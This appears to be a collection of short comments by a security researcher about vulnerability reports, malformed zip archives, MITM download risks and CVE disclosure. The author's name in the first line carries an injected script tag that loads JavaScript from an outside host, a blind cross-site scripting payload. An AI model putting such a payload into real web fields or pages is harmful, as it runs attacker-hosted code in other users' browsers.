Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

I'm confused, I think you may misunderstand the vulnerability. Can you elaborate upon your understanding of why you are not vulnerable?

If you're seeing errors like that, your test is likely operating on a malformed zip archive. Could you provide context around when/how this code is being used and what archives...

Hi @YANG-DB, Do you believe this fixed a valid security vulnerability? Do you need assistance with vulnerability disclosure and CVE issuance?

Was this issue resolved externally?

Perfect! Thanks for the update! 🙂

It's a bug in how this app is downloaded by all of it's users allowing them to be maliciously compromised via a MITM.

Not my project. I have no control over what gets merged, unfortunately.

@jbduncan I don't really have the energy here. If you're already in the mailing list, please feel free to raise the issue.

½ the reason I created this issue was because I knew someone else would run into this issue just like I did, use google, and probably find this issue. I'm...

The curse key could be encrypted and embedded in travis environment for auto-releases there. Again, something dan would need to do.